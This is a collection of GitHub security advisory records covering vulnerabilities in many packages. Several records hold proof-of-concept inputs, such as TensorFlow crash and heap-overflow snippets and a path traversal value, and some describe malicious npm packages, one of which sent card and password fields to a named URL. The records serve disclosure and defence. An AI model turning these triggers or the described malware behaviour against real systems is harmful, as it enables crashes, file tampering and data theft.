ProxyScotch is vulnerable to a server-side Request Forgery (SSRF)
ProxyScotch is a simple proxy server created for hoppscotch.io. The package github.com/hoppscotch/proxyscotch before 1.0.0 are vulnerable to Server-side Request Forgery (SSRF) when interceptor mode is set to proxy. It occurs when an HTTP request is made by a backend server to an untrusted URL submitted by a user. It leads to a leakage of sensitive information from the server.
{'CVE-2022-25850'}
2022-05-04T20:14:03Z
2022-05-03T00:00:44Z
HIGH
7.5
{'CWE-918'}
{'https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMHOPPSCOTCHPROXYSCOTCH-2435228', 'https://nvd.nist.gov/vuln/detail/CVE-2022-25850', 'https://github.com/advisories/GHSA-5hjh-c26m-xw8w', 'https://github.com/hoppscotch/proxyscotch/commit/de67380f62f907f201d75854b76024ba4885fab7'}
null
GHSA
GHSA-59g9-7gfx-c72p
Infinite loop in Tomcat due to parsing error
Apache Tomcat 8.5.0 to 8.5.63, 9.0.0-M1 to 9.0.43 and 10.0.0-M1 to 10.0.2 did not properly validate incoming TLS packets. When Tomcat was configured to use NIO+OpenSSL or NIO2+OpenSSL for TLS, a specially crafted packet could be used to trigger an infinite loop resulting in a denial of service.
{'CVE-2021-41079'}
2021-10-18T18:40:16Z
2021-09-20T20:45:44Z
HIGH
7.5
{'CWE-20'}
{'https://lists.apache.org/thread.html/r6b6b674e3f168dd010e67dbe6848b866e2acf26371452fdae313b98a@%3Cusers.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/rccdef0349fdf4fb73a4e4403095446d7fe6264e0a58e2df5c6799434%40%3Cannounce.tomcat.apache.org%3E', 'https://github.com/advisories/GHSA-59g9-7gfx-c72p', 'https://security.netapp.com/advisory/ntap-20211008-0005/', 'https://www.debian.org/security/2021/dsa-4986', 'https://lists.apache.org/thread.html/rb4de81ac647043541a32881099aa6eb5a23f1b7fd116f713f8ab9dbe@%3Cdev.tomcat.apache.org%3E', 'https://github.com/apache/tomcat/commit/34115fb3c83f6cd97772232316a492a4cc5729e0', 'https://lists.debian.org/debian-lts-announce/2021/09/msg00012.html', 'https://nvd.nist.gov/vuln/detail/CVE-2021-41079'}
null
GHSA
GHSA-j739-gw6q-f4c7
HTML Injection in Froxlor
Froxlor through 0.10.22 does not perform validation on user input passed in the customermail GET parameter. The value of this parameter is reflected in the login webpage, allowing the injection of arbitrary HTML tags. Note: Froxlor version 0.10.22 introduces AntiXSS cross-site scripting protection, but AntiXSS only provides partial protection for this particular issue.
{'CVE-2020-29653'}
2022-04-22T20:41:49Z
2022-04-14T00:00:19Z
MODERATE
6.1
{'CWE-79'}
{'https://github.com/advisories/GHSA-j739-gw6q-f4c7', 'https://nvd.nist.gov/vuln/detail/CVE-2020-29653', 'https://github.com/Froxlor/Froxlor/commit/6bf5eccc2477257b6c1760a3c3784ae7e0554ce0', 'https://github.com/Froxlor/Froxlor/security/advisories', 'https://nozero.io/en/cve-2020-29653-froxlor-html-injection-dangling-markup/'}
null
GHSA
GHSA-m7w4-8wp8-m2xq
Data races in beef
An issue was discovered in the beef crate before 0.5.0 for Rust. Affected versions of this crate did not have a `T: Sync` bound in the `Send` impl for `Cow<'_, T, U>`. This allows users to create data races by making `Cow` contain types that are (Send && !Sync) like `Cell<_>` or `RefCell<_>`. Such data races can lead to memory corruption. The flaw was corrected in commit d1c7658 by adding trait bounds `T: Sync` and `T::Owned: Send` to the `Send` impl for `Cow<'_, T, U>`.
{'CVE-2020-36442'}
2021-08-25T20:59:08Z
2021-08-25T20:59:08Z
HIGH
8.1
{'CWE-119', 'CWE-362'}
{'https://rustsec.org/advisories/RUSTSEC-2020-0122.html', 'https://github.com/advisories/GHSA-m7w4-8wp8-m2xq', 'https://nvd.nist.gov/vuln/detail/CVE-2020-36442', 'https://github.com/maciejhirsz/beef/issues/37'}
null
GHSA
GHSA-q799-q27x-vp7w
Out-of-bounds Write in OpenCV
An exploitable heap buffer overflow vulnerability exists in the data structure persistence functionality of OpenCV, version 4.1.0 (corresponds with OpenCV-Python version 4.1.2.30). A specially crafted JSON file can cause a buffer overflow, resulting in multiple heap corruptions and potentially code execution. An attacker can provide a specially crafted file to trigger this vulnerability.
{'CVE-2019-5064'}
2022-04-20T19:14:26Z
2021-10-12T22:23:21Z
HIGH
8.8
{'CWE-787', 'CWE-120'}
{'https://www.oracle.com//security-alerts/cpujul2021.html', 'https://github.com/opencv/opencv/releases/tag/4.2.0', 'https://github.com/opencv/opencv-python/releases/tag/32', 'https://github.com/opencv/opencv/issues/15857', 'https://github.com/advisories/GHSA-q799-q27x-vp7w', 'https://nvd.nist.gov/vuln/detail/CVE-2019-5064', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'https://talosintelligence.com/vulnerability_reports/TALOS-2019-0853'}
null
GHSA
GHSA-42j4-733x-5vcf
Regular expression denial of service (ReDoS) in EmailValidator class in Vaadin 7
Unsafe validation RegEx in `EmailValidator` class in `com.vaadin:vaadin-server` versions 7.0.0 through 7.7.21 (Vaadin 7.0.0 through 7.7.21) allows attackers to cause uncontrolled resource consumption by submitting malicious email addresses. - https://vaadin.com/security/cve-2020-36320
{'CVE-2020-36320'}
2021-04-26T19:29:49Z
2021-04-19T14:49:32Z
HIGH
7.5
{'CWE-400'}
{'https://github.com/vaadin/framework/issues/7757', 'https://github.com/advisories/GHSA-42j4-733x-5vcf', 'https://github.com/vaadin/framework/pull/12104', 'https://github.com/vaadin/framework/security/advisories/GHSA-42j4-733x-5vcf', 'https://nvd.nist.gov/vuln/detail/CVE-2020-36320', 'https://vaadin.com/security/cve-2020-36320'}
null
GHSA
GHSA-4g7x-7vgq-3j28
Vulnerability in list function leads to arbitrary code execution via filePath parameters
aaptjs is a node wraper for aapt. An issue was discovered in the list function in shenzhim aaptjs 1.3.1, allows attackers to execute arbitrary code via the filePath parameters.
{'CVE-2020-36376'}
2022-05-05T13:40:54Z
2021-11-02T15:42:16Z
CRITICAL
9.8
{'CWE-77', 'CWE-78'}
{'https://github.com/advisories/GHSA-4g7x-7vgq-3j28', 'https://github.com/shenzhim/aaptjs/issues/2', 'https://nvd.nist.gov/vuln/detail/CVE-2020-36376'}
null
GHSA
GHSA-gr4j-r575-g665
Cross-Site Scripting in highcharts
Versions of `highcharts` prior to 7.2.2 or 8.1.1 are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize `href` values and does not restrict URL schemes, allowing attackers to execute arbitrary JavaScript in a victim's browser if they click the link.
null
2021-09-23T19:06:36Z
2020-08-25T14:04:47Z
HIGH
8.7
{'CWE-79'}
{'https://www.npmjs.com/advisories/1227', 'https://github.com/advisories/GHSA-gr4j-r575-g665', 'https://github.com/highcharts/highcharts/issues/13559', 'https://snyk.io/vuln/SNYK-JS-HIGHCHARTS-571995'}
null
GHSA
GHSA-p5pg-wm9q-8v6r
Improper Handling of Exceptional Conditions inn metadata-extractor
metadata-extractor up to 2.16.0 can throw various uncaught exceptions while parsing a specially crafted JPEG file, which could result in an application crash. This could be used to mount a denial of service attack against services that use metadata-extractor library.
{'CVE-2022-24613'}
2022-03-08T21:10:19Z
2022-02-25T00:01:05Z
MODERATE
5.5
{'CWE-755'}
{'https://nvd.nist.gov/vuln/detail/CVE-2022-24613', 'https://github.com/drewnoakes/metadata-extractor/issues/561', 'https://github.com/advisories/GHSA-p5pg-wm9q-8v6r'}
null
GHSA
GHSA-fvqr-27wr-82fm
Prototype Pollution in lodash
Versions of `lodash` before 4.17.5 are vulnerable to prototype pollution. The vulnerable functions are 'defaultsDeep', 'merge', and 'mergeWith' which allow a malicious user to modify the prototype of `Object` via `__proto__` causing the addition or modification of an existing property that will exist on all objects. ## Recommendation Update to version 4.17.5 or later.
{'CVE-2018-3721'}
2021-01-08T18:51:08Z
2018-07-26T15:14:52Z
LOW
0
{'CWE-471'}
{'https://nvd.nist.gov/vuln/detail/CVE-2018-3721', 'https://www.npmjs.com/advisories/577', 'https://github.com/lodash/lodash/commit/d8e069cc3410082e44eb18fcf8e7f3d08ebe1d4a', 'https://security.netapp.com/advisory/ntap-20190919-0004/', 'https://hackerone.com/reports/310443', 'https://github.com/advisories/GHSA-fvqr-27wr-82fm'}
null
GHSA
GHSA-8mm3-2mcj-cx6r
Malicious Package in angluar-cli
Version 0.0.3 of `angluar-cli` contains malicious code as a postinstall script. The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. When installed the package attempts to remove files and stop processes related to McAfee antivirus on macOS. ## Recommendation Remove the package from your environment and verify whether files were deleted and if processes were stopped.
null
2021-09-30T21:58:44Z
2020-09-11T21:09:24Z
CRITICAL
9.8
{'CWE-506'}
{'https://www.npmjs.com/advisories/918', 'https://github.com/advisories/GHSA-8mm3-2mcj-cx6r'}
null
GHSA
GHSA-cq9c-55r7-455x
Moderate severity vulnerability that affects org.apache.karaf:apache-karaf
In Apache Karaf version prior to 3.0.9, 4.0.9, 4.1.1, when the webconsole feature is installed in Karaf, it is available at .../system/console and requires authentication to access it. One part of the console is a Gogo shell/console that gives access to the command line console of Karaf via a Web browser, and when navigated to it is available at .../system/console/gogo. Trying to go directly to that URL does require authentication. And optional bundle that some applications use is the Pax Web Extender Whiteboard, it is part of the pax-war feature and perhaps others. When it is installed, the Gogo console becomes available at another URL .../gogo/, and that URL is not secured giving access to the Karaf console to unauthenticated users. A mitigation for the issue is to manually stop/uninstall Gogo plugin bundle that is installed with the webconsole feature, although of course this removes the console from the .../system/console application, not only from the unauthenticated endpoint. One could also stop/uninstall the Pax Web Extender Whiteboard, but other components/applications may require it and so their functionality would be reduced/compromised.
{'CVE-2018-11787'}
2021-09-09T20:21:44Z
2019-01-07T19:14:51Z
HIGH
8.1
{'CWE-287'}
{'https://issues.apache.org/jira/browse/KARAF-4993', 'https://github.com/advisories/GHSA-cq9c-55r7-455x', 'https://nvd.nist.gov/vuln/detail/CVE-2018-11787', 'http://karaf.apache.org/security/cve-2018-11787.txt', 'https://lists.apache.org/thread.html/d9ba4c3104ba32225646879a057b75b54430f349c246c85469037d3c@%3Cdev.karaf.apache.org%3E'}
null
GHSA
GHSA-fvpg-qx3g-7mp7
High severity vulnerability that affects Microsoft.ChakraCore
A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0609, CVE-2019-0639, CVE-2019-0680, CVE-2019-0769, CVE-2019-0770, CVE-2019-0773, CVE-2019-0783.
{'CVE-2019-0771'}
2021-09-10T19:58:27Z
2019-04-09T19:43:29Z
HIGH
7.5
{'CWE-787'}
{'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0771', 'https://github.com/advisories/GHSA-fvpg-qx3g-7mp7', 'https://nvd.nist.gov/vuln/detail/CVE-2019-0771'}
null
GHSA
GHSA-hjhp-hwfj-hwf3
Cross Site Request Forgery in firefly-iii
firefly-iii is vulnerable to a Cross-Site Request Forgery (CSRF) attack which can disable two factor authentication for the target user.
{'CVE-2021-4005'}
2021-12-10T20:20:08Z
2021-12-10T20:20:08Z
MODERATE
4.3
{'CWE-352'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-4005', 'https://github.com/firefly-iii/firefly-iii/commit/03a1601bf343181df9f405dd2109aec483cb7053', 'https://github.com/advisories/GHSA-hjhp-hwfj-hwf3', 'https://huntr.dev/bounties/bf4ef581-325a-492d-a710-14fcb53f00ff'}
null
GHSA
GHSA-hq3v-rg6f-6hx4
Use of Insufficiently Random Values in yiisoft/yii2-dev
yii2 is vulnerable to Use of Predictable Algorithm in Random Number Generator
{'CVE-2021-3689'}
2021-09-01T18:35:34Z
2021-09-01T18:35:34Z
HIGH
7.5
{'CWE-330'}
{'https://huntr.dev/bounties/50aad1d4-eb00-4573-b8a4-dbe38e2c229f', 'https://github.com/yiisoft/yii2/commit/13f27e4d920a05d53236139e8b07007acd046a46', 'https://nvd.nist.gov/vuln/detail/CVE-2021-3689', 'https://github.com/advisories/GHSA-hq3v-rg6f-6hx4'}
null
GHSA
GHSA-j5jc-jf8f-86q7
Malicious Package in dictum.js
Version 1.0.5 of `dictum.js` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=` ## Recommendation If version 1.0.5 of this module is found installed you will want to replace it with a version before or after 1.0.5. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.
null
2020-09-01T20:38:30Z
2020-09-01T20:38:30Z
CRITICAL
0
null
{'https://github.com/advisories/GHSA-j5jc-jf8f-86q7', 'https://www.npmjs.com/advisories/640'}
null
GHSA
GHSA-3x4c-pq33-4w3q
Improper authorisation of members discloses room membership to non-members
### Impact Unauthorised users can access the membership (list of members, with their display names) of a room if they know the ID of the room. The vulnerability is limited to rooms with `shared` history visibility. Furthermore, the unauthorised user must be using an account on a vulnerable homeserver that is in the room. ### Patches Server administrators should upgrade to 1.41.1 or later. ### Workarounds Administrators of servers that use a reverse proxy could, with potentially unacceptable loss of functionality, block the following endpoints: * `/_matrix/client/r0/rooms/{room_id}/members` with `at` query parameter * `/_matrix/client/unstable/rooms/{room_id}/members` with `at` query parameter ### References n/a ### For more information If you have any questions or comments about this advisory, e-mail us at security@matrix.org.
{'CVE-2021-39164'}
2022-04-19T19:03:11Z
2021-09-01T18:25:27Z
LOW
3.1
{'CWE-200'}
{'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PXT7ID7DNBRN2TVTETU3SYQHJKEG6PXN/', 'https://github.com/matrix-org/synapse/commit/cb35df940a', 'https://nvd.nist.gov/vuln/detail/CVE-2021-39164', 'https://github.com/matrix-org/synapse/security/advisories/GHSA-3x4c-pq33-4w3q', 'https://github.com/advisories/GHSA-3x4c-pq33-4w3q', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2VHDEPCZ22GJFMZCWA2XZAGPOEV72POF/', 'https://github.com/matrix-org/synapse/releases/tag/v1.41.1'}
null
GHSA
GHSA-mh37-8c3g-3fgc
Escape sequence injection in RubyGems
An issue was discovered in RubyGems 2.6 and later through 3.0.2. The gem owner command outputs the contents of the API response directly to stdout. Therefore, if the response is crafted, escape sequence injection may occur.
{'CVE-2019-8322'}
2020-08-17T19:24:01Z
2019-06-20T16:06:00Z
HIGH
0
null
{'https://lists.debian.org/debian-lts-announce/2020/08/msg00027.html', 'https://nvd.nist.gov/vuln/detail/CVE-2019-8322', 'http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00036.html', 'https://hackerone.com/reports/315087', 'https://github.com/advisories/GHSA-mh37-8c3g-3fgc'}
null
GHSA
GHSA-6xhg-q9c8-rj32
Credential leak in react-native-fast-image
This affects all versions before version 8.3.0 of package react-native-fast-image. When an image with source={{uri: "...", headers: { host: "somehost.com", authorization: "..." }} is loaded, all other subsequent images will use the same headers, this can lead to signing credentials or other session tokens being leaked to other servers.
{'CVE-2020-7696'}
2021-05-18T01:52:54Z
2021-05-18T01:52:54Z
MODERATE
5.3
{'CWE-200'}
{'https://snyk.io/vuln/SNYK-JS-REACTNATIVEFASTIMAGE-572228', 'https://github.com/DylanVann/react-native-fast-image/pull/691', 'https://github.com/DylanVann/react-native-fast-image/commit/4a7cd64f5b0aa40b04d63ccb105ee2b511abe624', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7696', 'https://github.com/advisories/GHSA-6xhg-q9c8-rj32', 'https://github.com/DylanVann/react-native-fast-image/issues/690'}
null
GHSA
GHSA-mqh2-9wrp-vx84
Heap buffer overflow in `SparseSplit`
### Impact An attacker can cause a heap buffer overflow in `tf.raw_ops.SparseSplit`: ```python import tensorflow as tf shape_dims = tf.constant(0, dtype=tf.int64) indices = tf.ones([1, 1], dtype=tf.int64) values = tf.ones([1], dtype=tf.int64) shape = tf.ones([1], dtype=tf.int64) tf.raw_ops.SparseSplit( split_dim=shape_dims, indices=indices, values=values, shape=shape, num_split=1) ``` This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/699bff5d961f0abfde8fa3f876e6d241681fbef8/tensorflow/core/util/sparse/sparse_tensor.h#L528-L530) accesses an array element based on a user controlled offset: ```cc const int dim = input_tensor.indices().matrix<int64>()(i, split_dim); int slice_index = GetSliceIndex(dim, split_size, residual); num_values[slice_index]++; ``` This results in overriding values on the heap. ### Patches We have patched the issue in GitHub commit [8ba6fa29cd8bf9cef9b718dc31c78c73081f5b31](https://github.com/tensorflow/tensorflow/commit/8ba6fa29cd8bf9cef9b718dc31c78c73081f5b31). The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. ### Attribution This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.
{'CVE-2021-29558'}
2021-05-21T14:24:51Z
2021-05-21T14:24:51Z
LOW
2.5
{'CWE-787'}
{'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-mqh2-9wrp-vx84', 'https://github.com/tensorflow/tensorflow/commit/8ba6fa29cd8bf9cef9b718dc31c78c73081f5b31', 'https://github.com/advisories/GHSA-mqh2-9wrp-vx84', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29558'}
null
GHSA
GHSA-98p5-x8x4-c9m5
Integer overflow in TFLite
### Impact An attacker can craft a TFLite model that would cause an integer overflow [in embedding lookup operations](https://github.com/tensorflow/tensorflow/blob/ca6f96b62ad84207fbec580404eaa7dd7403a550/tensorflow/lite/kernels/embedding_lookup_sparse.cc#L179-L189): ```cc int embedding_size = 1; int lookup_size = 1; for (int i = 0; i < lookup_rank - 1; i++, k++) { const int dim = dense_shape->data.i32[i]; lookup_size *= dim; output_shape->data[k] = dim; } for (int i = 1; i < embedding_rank; i++, k++) { const int dim = SizeOfDimension(value, i); embedding_size *= dim; output_shape->data[k] = dim; } ``` Both `embedding_size` and `lookup_size` are products of values provided by the user. Hence, a malicious user could trigger overflows in the multiplication. In certain scenarios, this can then result in heap OOB read/write. ### Patches We have patched the issue in GitHub commits [f19be71717c497723ba0cea0379e84f061a75e01](https://github.com/tensorflow/tensorflow/commit/f19be71717c497723ba0cea0379e84f061a75e01), [1de49725a5fc4e48f1a3b902ec3599ee99283043](https://github.com/tensorflow/tensorflow/commit/1de49725a5fc4e48f1a3b902ec3599ee99283043) and [a4e401da71458d253b05e41f28637b65baf64be4](https://github.com/tensorflow/tensorflow/commit/a4e401da71458d253b05e41f28637b65baf64be4). The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range. ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. ### Attribution This vulnerability has been reported by Wang Xuan of Qihoo 360 AIVul Team.
{'CVE-2022-23559'}
2022-02-11T15:08:16Z
2022-02-09T23:52:51Z
HIGH
8.8
{'CWE-190'}
{'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-98p5-x8x4-c9m5', 'https://github.com/advisories/GHSA-98p5-x8x4-c9m5', 'https://nvd.nist.gov/vuln/detail/CVE-2022-23559', 'https://github.com/tensorflow/tensorflow/commit/a4e401da71458d253b05e41f28637b65baf64be4', 'https://github.com/tensorflow/tensorflow/commit/1de49725a5fc4e48f1a3b902ec3599ee99283043', 'https://github.com/tensorflow/tensorflow/commit/f19be71717c497723ba0cea0379e84f061a75e01', 'https://github.com/tensorflow/tensorflow/blob/ca6f96b62ad84207fbec580404eaa7dd7403a550/tensorflow/lite/kernels/embedding_lookup_sparse.cc#L179-L189'}
null
GHSA
GHSA-jwhv-rgqc-fqj5
Moderate severity vulnerability that affects rails
Session fixation vulnerability in Rails before 1.2.4, as used for Ruby on Rails, allows remote attackers to hijack web sessions via unspecified vectors related to "URL-based sessions."
{'CVE-2007-5380'}
2021-09-14T19:52:33Z
2017-10-24T18:33:38Z
MODERATE
0
{'CWE-384'}
{'http://bugs.gentoo.org/show_bug.cgi?id=195315', 'http://secunia.com/advisories/28136', 'https://nvd.nist.gov/vuln/detail/CVE-2007-5380', 'http://www.novell.com/linux/security/advisories/2007_25_sr.html', 'http://docs.info.apple.com/article.html?artnum=307179', 'http://weblog.rubyonrails.org/2007/10/5/rails-1-2-4-maintenance-release', 'http://security.gentoo.org/glsa/glsa-200711-17.xml', 'http://www.vupen.com/english/advisories/2007/3508', 'http://secunia.com/advisories/27657', 'http://secunia.com/advisories/27965', 'http://www.vupen.com/english/advisories/2007/4238', 'http://lists.apple.com/archives/security-announce/2007/Dec/msg00002.html', 'http://www.us-cert.gov/cas/techalerts/TA07-352A.html', 'https://github.com/advisories/GHSA-jwhv-rgqc-fqj5', 'http://www.securityfocus.com/bid/26096'}
null
GHSA
GHSA-8w3x-r6x7-c5r5
Cross-site Scripting in pimcore
pimcore is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
{'CVE-2021-4084'}
2021-12-16T14:28:27Z
2021-12-16T14:28:27Z
MODERATE
6.1
{'CWE-79'}
{'https://github.com/pimcore/pimcore/commit/3c2a14e676a57e5d77a16255965988eef48f9065', 'https://nvd.nist.gov/vuln/detail/CVE-2021-4084', 'https://github.com/advisories/GHSA-8w3x-r6x7-c5r5', 'https://huntr.dev/bounties/dcb37f19-ba53-4498-b953-d21999279266'}
null
GHSA
GHSA-g4h2-gqm3-c9wq
Segfault in tf.raw_ops.ImmutableConst
### Impact Calling [`tf.raw_ops.ImmutableConst`](https://www.tensorflow.org/api_docs/python/tf/raw_ops/ImmutableConst) with a `dtype` of `tf.resource` or `tf.variant` results in a segfault in the implementation as code assumes that the tensor contents are pure scalars. ```python >>> import tensorflow as tf >>> tf.raw_ops.ImmutableConst(dtype=tf.resource, shape=[], memory_region_name="/tmp/test.txt") ... Segmentation fault ``` ### Patches We have patched the issue in 4f663d4b8f0bec1b48da6fa091a7d29609980fa4 and will release TensorFlow 2.5.0 containing the patch. TensorFlow nightly packages after this commit will also have the issue resolved. ### Workarounds If using `tf.raw_ops.ImmutableConst` in code, you can prevent the segfault by inserting a filter for the `dtype` argument. ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
{'CVE-2021-29539'}
2021-05-21T14:23:05Z
2021-05-21T14:23:05Z
LOW
2.5
{'CWE-681'}
{'https://github.com/advisories/GHSA-g4h2-gqm3-c9wq', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-g4h2-gqm3-c9wq', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29539', 'https://github.com/tensorflow/tensorflow/commit/4f663d4b8f0bec1b48da6fa091a7d29609980fa4'}
null
GHSA
GHSA-9h4g-27m8-qjrg
Path Traversal in socket.io-file
All versions of `socket.io-file` are vulnerable to Path Traversal. The package fails to sanitize user input and uses it to generate the file upload paths. The `socket.io-file::createFile` message contains a `name` option that is passed directly to `path.join()`. It is possible to upload files to arbitrary folders on the server by sending relative paths on the `name` value, such as `../../test.js`. The `uploadDir` and `rename` options can be used to define the file upload path.
{'CVE-2020-15779'}
2021-09-22T20:28:29Z
2020-07-07T19:24:47Z
HIGH
7.5
{'CWE-22'}
{'https://www.npmjs.com/advisories/1519', 'https://github.com/advisories/GHSA-9h4g-27m8-qjrg', 'https://github.com/rico345100/socket.io-file', 'https://nvd.nist.gov/vuln/detail/CVE-2020-15779', 'https://www.npmjs.com/package/socket.io-file'}
null
GHSA
GHSA-729f-wvj3-c4pj
Remote code execution in UReport
An arbitrary file creation vulnerability in UReport 2.2.9 allows attackers to execute arbitrary code.
{'CVE-2020-21125'}
2021-09-20T20:45:03Z
2021-09-20T20:45:03Z
HIGH
0
{'CWE-22'}
{'https://nvd.nist.gov/vuln/detail/CVE-2020-21125', 'https://github.com/advisories/GHSA-729f-wvj3-c4pj', 'https://github.com/youseries/ureport/issues/485'}
null
GHSA
GHSA-33gc-f8v9-v8hm
Malicious Package in ladder-text-js
`ladder-text-js` contained a malicious script that attempted to delete all files when `npm test` was run. ## Recommendation This module has been unpublished from the npm Registry. If you find this module in your environment remove it.
null
2021-10-01T13:27:37Z
2020-09-01T20:41:40Z
CRITICAL
9.8
{'CWE-506'}
{'https://github.com/advisories/GHSA-33gc-f8v9-v8hm', 'https://www.npmjs.com/advisories/651'}
null
GHSA
GHSA-pgcp-m69h-p2gr
Cross-site Scripting (XSS) in moodle
In Moodle, it was possible to include JavaScript when re-naming content bank items. Versions affected: 3.9 to 3.9.2. This is fixed in moodle 3.9.3 and 3.10.
{'CVE-2020-25702'}
2021-03-29T20:43:08Z
2021-03-29T20:43:08Z
MODERATE
6.1
{'CWE-79'}
{'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4NNFCHPPHRJNJROIX6SYMHOC6HMKP3GU/', 'https://github.com/moodle/moodle/commit/66be08216e647532b295a9132070d2435ecd7ad9', 'https://bugzilla.redhat.com/show_bug.cgi?id=1895437', 'https://moodle.org/mod/forum/discuss.php?d=413940', 'https://nvd.nist.gov/vuln/detail/CVE-2020-25702', 'https://github.com/advisories/GHSA-pgcp-m69h-p2gr', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/B55KXBVAT45MDASJ3EK6VIGQOYGJ4NH6/'}
null
GHSA
GHSA-mv78-g7wq-mhp4
Division by zero in padding computation in TFLite
### Impact The TFLite computation for size of output after padding, [`ComputeOutSize`](https://github.com/tensorflow/tensorflow/blob/0c9692ae7b1671c983569e5d3de5565843d500cf/tensorflow/lite/kernels/padding.h#L43-L55), does not check that the `stride` argument is not 0 before doing the division. ```cc inline int ComputeOutSize(TfLitePadding padding, int image_size, int filter_size, int stride, int dilation_rate = 1) { int effective_filter_size = (filter_size - 1) * dilation_rate + 1; switch (padding) { case kTfLitePaddingSame: return (image_size + stride - 1) / stride; case kTfLitePaddingValid: return (image_size + stride - effective_filter_size) / stride; default: return 0; } } ``` Users can craft special models such that `ComputeOutSize` is called with `stride` set to 0. ### Patches We have patched the issue in GitHub commit [49847ae69a4e1a97ae7f2db5e217c77721e37948](https://github.com/tensorflow/tensorflow/commit/49847ae69a4e1a97ae7f2db5e217c77721e37948). The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. ### Attribution This vulnerability has been reported by members of the Aivul Team from Qihoo 360.
{'CVE-2021-29585'}
2021-05-21T14:26:41Z
2021-05-21T14:26:41Z
LOW
2.5
{'CWE-369'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-29585', 'https://github.com/tensorflow/tensorflow/commit/49847ae69a4e1a97ae7f2db5e217c77721e37948', 'https://github.com/advisories/GHSA-mv78-g7wq-mhp4', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-mv78-g7wq-mhp4'}
null
GHSA
GHSA-vr98-27qj-3c8q
Directory traversal in rollup-plugin-server
This affects all versions of package rollup-plugin-dev-server. There is no path sanitization in readFile operation inside the readFileFromContentBase function.
{'CVE-2020-7686'}
2021-09-23T17:34:46Z
2020-07-29T18:07:35Z
HIGH
7.5
{'CWE-22'}
{'https://snyk.io/vuln/SNYK-JS-ROLLUPPLUGINDEVSERVER-590124', 'https://github.com/advisories/GHSA-vr98-27qj-3c8q', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7686'}
null
GHSA
GHSA-h58v-c6rf-g9f7
Cross site scripting in the system log
### Impact It is possible to inject code into the `tl_log` table that will be executed in the browser when the system log is called in the back end. ### Patches Update to Contao 4.9.16 or 4.11.5. ### Workarounds Disable the system log module in the back end for all users (especially admin users). ### References https://contao.org/en/security-advisories/cross-site-scripting-in-the-system-log-2021.html ### For more information If you have any questions or comments about this advisory, open an issue in [contao/contao](https://github.com/contao/contao/issues/new/choose).
{'CVE-2021-35210'}
2021-07-01T17:00:04Z
2021-07-01T17:00:04Z
MODERATE
6.1
{'CWE-79'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-35210', 'https://github.com/contao/contao/security/advisories/GHSA-h58v-c6rf-g9f7', 'https://github.com/advisories/GHSA-h58v-c6rf-g9f7', 'https://contao.org/en/security-advisories/cross-site-scripting-in-the-system-log-2021.html'}
null
GHSA
GHSA-grvw-q343-58wh
Out-of-bounds write
A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1138, CVE-2019-1217, CVE-2019-1237, CVE-2019-1298.
{'CVE-2019-1300'}
2021-03-29T20:55:57Z
2021-03-29T20:55:57Z
HIGH
7.5
{'CWE-787'}
{'https://github.com/chakra-core/ChakraCore/commit/7e9a2ee60baa95ceb4f48f522f823c812ca90c80', 'https://github.com/chakra-core/ChakraCore/commit/95b3e3400afb8fa20743657f3a8057fb451e6f69', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1300', 'https://nvd.nist.gov/vuln/detail/CVE-2019-1300', 'https://github.com/advisories/GHSA-grvw-q343-58wh'}
null
GHSA
GHSA-4vp3-vfww-8648
Incorrect permission enforcement in UmbracoCms
Editors/LogViewerController.cs in Umbraco through 8.9.1 allows a user to visit a logviewer endpoint even if they lack Applications.Settings access.
{'CVE-2020-29454'}
2021-04-13T15:48:05Z
2021-04-13T15:48:05Z
MODERATE
4.3
{'CWE-732'}
